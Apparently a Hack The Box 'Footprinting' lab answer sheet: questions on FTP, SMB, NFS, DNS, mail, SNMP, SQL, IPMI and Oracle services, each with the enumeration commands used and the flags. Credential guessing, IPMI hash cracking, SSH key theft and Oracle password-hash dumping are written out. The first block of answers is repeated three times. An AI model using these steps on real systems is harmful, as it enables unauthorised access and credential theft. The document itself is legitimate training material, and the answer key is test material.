-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathFootprinting
604 lines (459 loc) · 21.8 KB
/
Footprinting
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
Which version of the FTP server is running on the target system? Submit the entire banner as the answer.
nmap -sV -sC -p21 10.129.202.5
Infreight FTP v1.1
Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer.
nmap --script=/usr/share/nmap/scripts/ftp-anon.nse 10.129.202.5
get flag.txt
cat /home/htb-ac633072/flag.txt
HTB{b7skjr4c76zhsds7fzhd4k3ujg7nhdjre}
What version of the SMB server is running on the target system? Submit the entire banner as the answer.
nmap -sC -sV -p 139,445 10.129.202.5
Samba smbd 4.6.2
What is the name of the accessible share on the target?
rpcclient -U "" 10.129.202.5
(hit enter for password)
srvinfo
sambashare
(the only one without a $)
Connect to the discovered share and find the flag.txt file. Submit the contents as the answer.
smbclient //10.129.202.5/sambashare
ls
cd contents
cat /home/htb-ac633072/flag.txt
HTB{o873nz4xdo873n4zo873zn4fksuhldsf}
Find out which domain the server belongs to.
rpcclient -U "" 10.129.202.5
enumdomains
DEVOPS
Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer.
netsharegetinfo sambashare
InFreight SMB v3.1
What is the full system path of that specific share?
/home/sambauser
Enumerate the NFS service and submit the contents of the flag.txt in the "nfs" share as the answer.
nmap -sV -sC -p- --script=nfs* 10.129.202.5
mkdir nfs
sudo mount -t nfs 10.129.202.5:/var/nfs ./nfs/ -o nolock
cd nfs
cat flag.txt
HTB{hjglmvtkjhlkfuhgi734zthrie7rjmdze}
Enumerate the NFS service and submit the contents of the flag.txt in the "nfsshare" share as the answer.
mkdir nfsshare
sudo mount -t nfs 10.129.202.5:/mnt/nfsshare ./nfsshare/ -o nolock
cd nfsshare/
cat flag.txt
HTB{8o7435zhtuih7fztdrzuhdhkfjcn7ghi4357ndcthzuc7rtfghu34}
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
dig ns inlanefreight.htb @10.129.91.31
ns.inlanefreight.htb.
Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))
dig axfr internal.inlanefreight.htb @10.129.91.31
HTB{DN5_z0N3_7r4N5F3r_iskdufhcnlu34}
What is the IPv4 address of the hostname DC1?
dig axfr internal.inlanefreight.htb @10.129.91.31
10.129.34.16
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
dnsenum --dnsserver 10.129.197.206 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/fierce-hostlist.txt dev.inlanefreight.htb
win2k.dev.inlanefreight.htb
Enumerate the SMTP service and submit the banner, including its version as the answer.
nmap -sV -sC -p25 10.129.122.123
InFreight ESMTP v2.11
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
msfconsole
use auxiliary/scanner/smtp/smtp_enum
set USER_FILE <file in resource>
robin
Figure out the exact organization name from the IMAP/POP3 service and submit it as the answer.
curl -k -v 'pop3s://10.129.122.123' --user robin:robin
InlaneFreight Ltd;
What is the FQDN that the IMAP and POP3 servers are assigned to?
curl -k -v 'pop3s://10.129.122.123' --user robin:robin
dev.inlanefreight.htb
Enumerate the IMAP service and submit the flag as the answer. (Format: HTB{...})
openssl s_client -connect 10.129.122.123:imaps
HTB{roncfbw7iszerd7shni7jr2343zhrj}
What is the customized version of the POP3 server?
openssl s_client -connect 10.129.122.123:pop3s
InFreight POP3 v9.188
What is the admin email address?
openssl s_client -connect 10.129.122.123:imaps
1 LOGIN robin robin
1 LIST * *
1 SELECT DEV.DEPARTMENT.INT
1 FETCH 1 all
Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})
openssl s_client -connect 10.129.122.123:imaps
1 LOGIN robin robin
1 LIST * *
1 SELECT DEV.DEPARTMENT.INT
1 FETCH 1 all
1 FETCH 1 body[text]
HTB{983uzn8jmfgpd8jmof8c34n7zio}
Enumerate the SNMP service and obtain the email address of the admin. Submit it as the answer.
snmpwalk -v2c -c public 10.129.42.195
What is the customized version of the SNMP server?
snmpwalk -v2c -c public 10.129.42.195
InFreight SNMP v0.91
Enumerate the custom script that is running on the system and submit its output as the answer.
snmpwalk -v2c -c public 10.129.42.195
HTB{5nMp_fl4g_uidhfljnsldiuhbfsdij44738b2u763g}"
Enumerate the MySQL server and determine the version in use. (Format: MySQL X.X.XX)
nmap -sC -sV 10.129.100.169
MySQL 8.0.27
During our penetration test, we found weak credentials "robin:robin". We should try these against the MySQL server. What is the email address of the customer "Otto Lang"?
mysql -u robin -probin -h 10.129.94.44
show databases;
use customers;
show tables;
select * from myTable where name='Otto Lang';
Enumerate the target using the concepts taught in this section. List the hostname of MSSQL server.
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
ILF-SQL-01
Connect to the MSSQL instance running on the target using the account (backdoor:Password1), then list the non-default database present on the server.
mssqlclient.py -p 1433 [email protected] -windows-auth
select name from sys.databases
Employees
What username is configured for accessing the host via IPMI?
msfconsole
use auxiliary/scanner/ipmi/ipmi_version
use auxiliary/scanner/ipmi/ipmi_dumphashes
admin
What username is configured for accessing the host via IPMI?
take hash from earlier scan and save into /tmp/ipmi
hashcat -m 7300 /tmp/ipmi /usr/share/wordlists/rockyou.txt
Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.
sudo nmap -sV -sC -v 10.129.116.210
ftp -p 10.129.116.210 2121
ceil // qwer1234
cd .ssh
get id_rsa
chmod 0600 id_rsa
ssh -i id_rsa [email protected]
find / -type f -name *flag* 2>/dev/null
cat /home/flag/flag.txt
HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}
Which version of the FTP server is running on the target system? Submit the entire banner as the answer.
nmap -sV -sC -p21 10.129.202.5
Infreight FTP v1.1
Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer.
nmap --script=/usr/share/nmap/scripts/ftp-anon.nse 10.129.202.5
get flag.txt
cat /home/htb-ac633072/flag.txt
HTB{b7skjr4c76zhsds7fzhd4k3ujg7nhdjre}
What version of the SMB server is running on the target system? Submit the entire banner as the answer.
nmap -sC -sV -p 139,445 10.129.202.5
Samba smbd 4.6.2
What is the name of the accessible share on the target?
rpcclient -U "" 10.129.202.5
(hit enter for password)
srvinfo
sambashare
(the only one without a $)
Connect to the discovered share and find the flag.txt file. Submit the contents as the answer.
smbclient //10.129.202.5/sambashare
ls
cd contents
cat /home/htb-ac633072/flag.txt
HTB{o873nz4xdo873n4zo873zn4fksuhldsf}
Find out which domain the server belongs to.
rpcclient -U "" 10.129.202.5
enumdomains
DEVOPS
Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer.
netsharegetinfo sambashare
InFreight SMB v3.1
What is the full system path of that specific share?
/home/sambauser
Enumerate the NFS service and submit the contents of the flag.txt in the "nfs" share as the answer.
nmap -sV -sC -p- --script=nfs* 10.129.202.5
mkdir nfs
sudo mount -t nfs 10.129.202.5:/var/nfs ./nfs/ -o nolock
cd nfs
cat flag.txt
HTB{hjglmvtkjhlkfuhgi734zthrie7rjmdze}
Enumerate the NFS service and submit the contents of the flag.txt in the "nfsshare" share as the answer.
mkdir nfsshare
sudo mount -t nfs 10.129.202.5:/mnt/nfsshare ./nfsshare/ -o nolock
cd nfsshare/
cat flag.txt
HTB{8o7435zhtuih7fztdrzuhdhkfjcn7ghi4357ndcthzuc7rtfghu34}
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
dig ns inlanefreight.htb @10.129.91.31
ns.inlanefreight.htb.
Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))
dig axfr internal.inlanefreight.htb @10.129.91.31
HTB{DN5_z0N3_7r4N5F3r_iskdufhcnlu34}
What is the IPv4 address of the hostname DC1?
dig axfr internal.inlanefreight.htb @10.129.91.31
10.129.34.16
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
dnsenum --dnsserver 10.129.197.206 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/fierce-hostlist.txt dev.inlanefreight.htb
win2k.dev.inlanefreight.htb
Enumerate the SMTP service and submit the banner, including its version as the answer.
nmap -sV -sC -p25 10.129.122.123
InFreight ESMTP v2.11
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
msfconsole
use auxiliary/scanner/smtp/smtp_enum
set USER_FILE <file in resource>
robin
Figure out the exact organization name from the IMAP/POP3 service and submit it as the answer.
curl -k -v 'pop3s://10.129.122.123' --user robin:robin
InlaneFreight Ltd;
What is the FQDN that the IMAP and POP3 servers are assigned to?
curl -k -v 'pop3s://10.129.122.123' --user robin:robin
dev.inlanefreight.htb
Enumerate the IMAP service and submit the flag as the answer. (Format: HTB{...})
openssl s_client -connect 10.129.122.123:imaps
HTB{roncfbw7iszerd7shni7jr2343zhrj}
What is the customized version of the POP3 server?
openssl s_client -connect 10.129.122.123:pop3s
InFreight POP3 v9.188
What is the admin email address?
openssl s_client -connect 10.129.122.123:imaps
1 LOGIN robin robin
1 LIST * *
1 SELECT DEV.DEPARTMENT.INT
1 FETCH 1 all
Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})
openssl s_client -connect 10.129.122.123:imaps
1 LOGIN robin robin
1 LIST * *
1 SELECT DEV.DEPARTMENT.INT
1 FETCH 1 all
1 FETCH 1 body[text]
HTB{983uzn8jmfgpd8jmof8c34n7zio}
Enumerate the SNMP service and obtain the email address of the admin. Submit it as the answer.
snmpwalk -v2c -c public 10.129.42.195
What is the customized version of the SNMP server?
snmpwalk -v2c -c public 10.129.42.195
InFreight SNMP v0.91
Enumerate the custom script that is running on the system and submit its output as the answer.
snmpwalk -v2c -c public 10.129.42.195
HTB{5nMp_fl4g_uidhfljnsldiuhbfsdij44738b2u763g}"
Enumerate the MySQL server and determine the version in use. (Format: MySQL X.X.XX)
nmap -sC -sV 10.129.100.169
MySQL 8.0.27
During our penetration test, we found weak credentials "robin:robin". We should try these against the MySQL server. What is the email address of the customer "Otto Lang"?
mysql -u robin -probin -h 10.129.94.44
show databases;
use customers;
show tables;
select * from myTable where name='Otto Lang';
Enumerate the target using the concepts taught in this section. List the hostname of MSSQL server.
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
ILF-SQL-01
Connect to the MSSQL instance running on the target using the account (backdoor:Password1), then list the non-default database present on the server.
mssqlclient.py -p 1433 [email protected] -windows-auth
select name from sys.databases
Employees
What username is configured for accessing the host via IPMI?
msfconsole
use auxiliary/scanner/ipmi/ipmi_version
use auxiliary/scanner/ipmi/ipmi_dumphashes
admin
What username is configured for accessing the host via IPMI?
take hash from earlier scan and save into /tmp/ipmi
hashcat -m 7300 /tmp/ipmi /usr/share/wordlists/rockyou.txt
Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.
sudo nmap -sV -sC -v 10.129.116.210
ftp -p 10.129.116.210 2121
ceil // qwer1234
cd .ssh
get id_rsa
chmod 0600 id_rsa
ssh -i id_rsa [email protected]
find / -type f -name *flag* 2>/dev/null
cat /home/flag/flag.txt
HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}
Which version of the FTP server is running on the target system? Submit the entire banner as the answer.
nmap -sV -sC -p21 10.129.202.5
Infreight FTP v1.1
Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer.
nmap --script=/usr/share/nmap/scripts/ftp-anon.nse 10.129.202.5
get flag.txt
cat /home/htb-ac633072/flag.txt
HTB{b7skjr4c76zhsds7fzhd4k3ujg7nhdjre}
What version of the SMB server is running on the target system? Submit the entire banner as the answer.
nmap -sC -sV -p 139,445 10.129.202.5
Samba smbd 4.6.2
What is the name of the accessible share on the target?
rpcclient -U "" 10.129.202.5
(hit enter for password)
srvinfo
sambashare
(the only one without a $)
Connect to the discovered share and find the flag.txt file. Submit the contents as the answer.
smbclient //10.129.202.5/sambashare
ls
cd contents
cat /home/htb-ac633072/flag.txt
HTB{o873nz4xdo873n4zo873zn4fksuhldsf}
Find out which domain the server belongs to.
rpcclient -U "" 10.129.202.5
enumdomains
DEVOPS
Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer.
netsharegetinfo sambashare
InFreight SMB v3.1
What is the full system path of that specific share?
/home/sambauser
Enumerate the NFS service and submit the contents of the flag.txt in the "nfs" share as the answer.
nmap -sV -sC -p- --script=nfs* 10.129.202.5
mkdir nfs
sudo mount -t nfs 10.129.202.5:/var/nfs ./nfs/ -o nolock
cd nfs
cat flag.txt
HTB{hjglmvtkjhlkfuhgi734zthrie7rjmdze}
Enumerate the NFS service and submit the contents of the flag.txt in the "nfsshare" share as the answer.
mkdir nfsshare
sudo mount -t nfs 10.129.202.5:/mnt/nfsshare ./nfsshare/ -o nolock
cd nfsshare/
cat flag.txt
HTB{8o7435zhtuih7fztdrzuhdhkfjcn7ghi4357ndcthzuc7rtfghu34}
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
dig ns inlanefreight.htb @10.129.91.31
ns.inlanefreight.htb.
Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))
dig axfr internal.inlanefreight.htb @10.129.91.31
HTB{DN5_z0N3_7r4N5F3r_iskdufhcnlu34}
What is the IPv4 address of the hostname DC1?
dig axfr internal.inlanefreight.htb @10.129.91.31
10.129.34.16
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
dnsenum --dnsserver 10.129.197.206 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/fierce-hostlist.txt dev.inlanefreight.htb
win2k.dev.inlanefreight.htb
Enumerate the SMTP service and submit the banner, including its version as the answer.
nmap -sV -sC -p25 10.129.122.123
InFreight ESMTP v2.11
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
msfconsole
use auxiliary/scanner/smtp/smtp_enum
set USER_FILE <file in resource>
robin
Figure out the exact organization name from the IMAP/POP3 service and submit it as the answer.
curl -k -v 'pop3s://10.129.122.123' --user robin:robin
InlaneFreight Ltd;
What is the FQDN that the IMAP and POP3 servers are assigned to?
curl -k -v 'pop3s://10.129.122.123' --user robin:robin
dev.inlanefreight.htb
Enumerate the IMAP service and submit the flag as the answer. (Format: HTB{...})
openssl s_client -connect 10.129.122.123:imaps
HTB{roncfbw7iszerd7shni7jr2343zhrj}
What is the customized version of the POP3 server?
openssl s_client -connect 10.129.122.123:pop3s
InFreight POP3 v9.188
What is the admin email address?
openssl s_client -connect 10.129.122.123:imaps
1 LOGIN robin robin
1 LIST * *
1 SELECT DEV.DEPARTMENT.INT
1 FETCH 1 all
Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})
openssl s_client -connect 10.129.122.123:imaps
1 LOGIN robin robin
1 LIST * *
1 SELECT DEV.DEPARTMENT.INT
1 FETCH 1 all
1 FETCH 1 body[text]
HTB{983uzn8jmfgpd8jmof8c34n7zio}
Enumerate the SNMP service and obtain the email address of the admin. Submit it as the answer.
snmpwalk -v2c -c public 10.129.42.195
What is the customized version of the SNMP server?
snmpwalk -v2c -c public 10.129.42.195
InFreight SNMP v0.91
Enumerate the custom script that is running on the system and submit its output as the answer.
snmpwalk -v2c -c public 10.129.42.195
HTB{5nMp_fl4g_uidhfljnsldiuhbfsdij44738b2u763g}"
Enumerate the MySQL server and determine the version in use. (Format: MySQL X.X.XX)
nmap -sC -sV 10.129.100.169
MySQL 8.0.27
During our penetration test, we found weak credentials "robin:robin". We should try these against the MySQL server. What is the email address of the customer "Otto Lang"?
mysql -u robin -probin -h 10.129.94.44
show databases;
use customers;
show tables;
select * from myTable where name='Otto Lang';
Enumerate the target using the concepts taught in this section. List the hostname of MSSQL server.
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
ILF-SQL-01
Connect to the MSSQL instance running on the target using the account (backdoor:Password1), then list the non-default database present on the server.
mssqlclient.py -p 1433 [email protected] -windows-auth
select name from sys.databases
Employees
What username is configured for accessing the host via IPMI?
msfconsole
use auxiliary/scanner/ipmi/ipmi_version
use auxiliary/scanner/ipmi/ipmi_dumphashes
admin
What username is configured for accessing the host via IPMI?
take hash from earlier scan and save into /tmp/ipmi
hashcat -m 7300 /tmp/ipmi /usr/share/wordlists/rockyou.txt
Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.
sudo nmap -sV -sC -v 10.129.116.210
ftp -p 10.129.116.210 2121
ceil // qwer1234
cd .ssh
get id_rsa
chmod 0600 id_rsa
ssh -i id_rsa [email protected]
find / -type f -name *flag* 2>/dev/null
cat /home/flag/flag.txt
HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}
Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer.
sudo nmap -sV -sC -v 10.129.75.147
showmount -e 10.129.75.147
sudo mount -t nfs 10.129.75.147:/TechSupport ./mount/ -o nolock
cd /mount
ls -lisa
cat ticket4238791283782.txt (get alex username and password)
smbclient --user=alex -L //10.129.75.147
smbclient --user=alex //10.129.75.147/devshare
ls
get important.txt (get sa and password)
xfreerdp /u:administrator /p:'87N1ns@slls83' /v:10.129.202.41 (use sa password with builtin administrator account)
lnch7ehrdn43i7AoqVPK4zWR
Enumerate the server carefully and find the username "HTB" and its password. Then, submit HTB's password as the answer.
onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt 10.129.202.20
#backup
#commnity is backup
braa [email protected]:.1.3.6.*
10.129.202.20:82ms:.80:tom NMds732Js2761
openssl s_client -connect 10.129.202.20:imaps
#find email with ssh key
1 SELECT INBOX
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 0 RECENT
1 FETCH 1 all
1 LIST * *
1 FETCH 1 body[text]
#found ssh key
ssh -i tom_id_rsa [email protected]
cat .bash_history (shows mysql)
mysql -u tom -p
use users;
select * from users where username like 'HTB';
cr3n4o7rzse7rzhnckhssncif7ds
Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.
sudo nmap -p1521 -sV 10.129.68.254 --open --script oracle-sid-brute
./odat.py all -s 10.129.68.254
[+] Accounts found on 10.129.68.254:1521/sid:XE:
scott/tiger
#to fix sqlplus error while loading libraryes
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
select table_name from all_tables;
select * from user_role_privs;
#no privs but can try to login as sysdba
sqlplus scott/[email protected]/XE as sysdba
select name,password from sys.user$;
DBSNMP E066D214D5421CCC